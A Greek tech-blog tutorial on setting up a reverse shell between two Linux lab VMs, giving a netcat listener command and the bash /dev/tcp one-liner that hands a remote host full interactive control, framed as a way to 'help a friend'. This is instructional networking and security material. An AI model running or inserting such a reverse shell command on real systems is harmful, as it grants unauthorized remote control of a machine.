• Skip to main content
  • Skip to header right navigation
  • Skip to site footer
iGuRu

iGuRu

Νέα Τεχνολογίας σε πραγματικό χρόνο. Απόψεις & Tweaks

  • /news
  • /infosec
  • /tools
  • /tweaks
  • /dummies
  • /απόψεις
  • /support
home / infosec / Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux

Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux

23/02/2021 18:56 by Anastasis Vasileiadis

Σε αυτόν τον οδηγό πρόκειται να σας δείξουμε πώς να φτιάξετε ένα reverse shell ανάμεσα σε δύο μηχανήματα Linux.

reverse shell yeahhub tutorial - Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux

Για τον σκοπό αυτόν θα χρησιμοποιούμε δύο VM που τρέχουν linux, το ένα θα είναι το Kali Linux και το άλλο θα είναι το Backtrack Linux.

  • Για Kali Linux Machine IP – 192.168.179.137
  • Για Backtrack Linux Machine IP – 192.168.179.139

Τι είναι το Reverse Shell

Συνήθως όταν πραγματοποιείτε οποιαδήποτε σύνδεση TCP / IP μεταξύ δύο υπολογιστών, τότε ένας διακομιστής (server) χειρίζεται τη σύνδεση και ένας άλλος ο λεγόμενος πελάτης (client) προσπαθεί να πραγματοποιήσει τη σύνδεση.

reverse shell yeahhub - Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux

Πού μπορείτε να χρησιμοποιήσετε το Reverse Shell

Απλώς σκεφτείτε ότι θέλετε να βοηθήσετε έναν φίλο, αλλά δεν διαθέτει διακομιστή (server) με port forward (προώθηση πόρτας) κλπ και φυσικά να μην μπορείτε να συνδεθείτε στο μηχάνημά του. Σε αυτήν την περίπτωση μπορείτε να χρησιμοποιήσετε το Reverse Shell, ώστε να λάβετε με reverse TCP / IP μία σύνδεση στο μηχάνημα του φίλου σας ,με πλήρη πρόσβαση διαχειριστή.

Μην σκέφτεστε παράνομα, δεν θέλω ζαβολιές 1f642 - Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux

Τώρα πρόκειται να χρησιμοποιήσουμε το Netcat από την πλευρά του διακομιστή, δηλαδή στο BT Machine. Το Netcat είναι ένα δωρεάν βοηθητικό πρόγραμμα δικτύου, που χρησιμοποιείται για ανάγνωση / εγγραφή για TCP και UDP sockets.

Βήμα 1: Το πρώτο σας βήμα είναι να θέσετε το μηχάνημά σας σε λειτουργία listening με τη βοήθεια της ακόλουθης εντολής:

Εντολή: nc -l -vv -p 1337

Εδώ, -l σημαίνει λειτουργία listening, -vv σημαίνει λειτουργία verbose και -p μας δείχνει τη θύρα που χρησιμοποιείται για τον διακομιστή.

Μόλις τρέξετε την εντολή στο μηχάνημά σας (BT), θα πρέπει να σας εμφανίσει το παρακάτω:

netcat 1 - Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux

Βήμα 2: Τώρα πηγαίνετε στο μηχάνημα του client, δηλαδή στο Kali Linux Machine που θέλετε να ελέγξετε από το τερματικό σας. Εδώ πρόκειται να ανακατευθύνουμε το τυπικό i / o / e του bash client στον διακομιστή με τη βοήθεια της εντολής bash:

Εντολή: bash -i &> /dev/tcp/192.168.179.139/1337 0> & 1

Εδώ το bash -i μας δείχνει ότι το Interactive bash, &> / dev / tcp / <IP> / <PORT> stand ανακατευθύνει την τυπική έξοδο και το σφάλμα του bash στον διακομιστή, καθώς και ότι 0> & 1 σημαίνει σύνδεση της τυπικής εισόδου του bash με την έξοδο.

netcat2 - Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux

Εδώ και τα δύο μηχανήματα συνδέονται στο ίδιο δίκτυο μέσω της λειτουργίας NAT, οπότε θα χρησιμοποιήσουμε την τοπική μας IP.

Μόλις εσείς ή ο φίλος σας εκτελέσετε την παραπάνω εντολή στο μηχάνημα σας, θα συνδεθείτε με αυτό και θα μπορείτε να το ελέγχετε πλήρως, μέσω του shell τερματικού.

netcat3 - Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux
Καλή επιτυχία.

Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux was last modified: 23 Φεβρουαρίου, 2021, 6:56 μμ by Anastasis Vasileiadis

Subscribe to our newsletter

no spam

spread the news

  • Facebook
  • Twitter
  • Reddit
  • Εκτύπωση
  • Email

Διαβάστε τις Τεχνολογικές Ειδήσεις από όλο τον κόσμο, με την εγκυρότητα του iGuRu.gr

Ακολουθήσετε μας στο Google News


Κατηγορία: infosectag: linux, reverse, shell:

You May Also Like

Windows 10 exploitation μόνο με μια εικόνα
Ubuntu 21.04 (Hirsute Hippo) Feature Freeze
Οδηγός DDOS σε δίκτυο WiFi

Σχετικά Anastasis Vasileiadis

Οι μεταφράσεις είναι σαν τις γυναίκες. Όταν είναι ωραίες δεν είναι πιστές και όταν είναι πιστές δεν είναι ωραίες.

Previous Post: « Firefox 86.0 λήψη πριν την επίσημη κυκλοφορία
Next Post: Οδηγός επίθεσης MITM σε τοπικό δίκτυο »

Reader Interactions

Comment Policy:

Tο iGuRu.gr δεν δημοσιεύει άμεσα τα σχόλια. Κακόβουλα σχόλια, σχόλια που συμπεριλαμβάνουν διαφημίσεις, ή σχόλια με ύβρεις διαγράφονται χωρίς καμία προειδοποίηση. Δεν υιοθετούμε τις απόψεις που εκφράζουν οι αναγνώστες μας.
Τα σχολιά σας θα εμφανιστούν μετά την έγκρισή τους από τους διαχειριστές


Αφήστε το σχόλιό σας
Ακύρωση απάντησης

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

 

 © 2021 · iGuRu.gr · ☢ · Keep It Simple Stupid Genesis theme

about  ·   contact  ·  rss  ·  sitemap  ·  tos

loadingΆκυρο
Δεν ήταν δυνατή η αποστολή της δημοσίευσης - ελέγξτε την διεύθυνση email!
Ο έλεγχος του email απέτυχε, παρακαλώ προσπαθήστε ξανά
Το ιστολόγιο σας δεν μπορεί να κοινοποιεί δημοσιεύσεις μέσω email.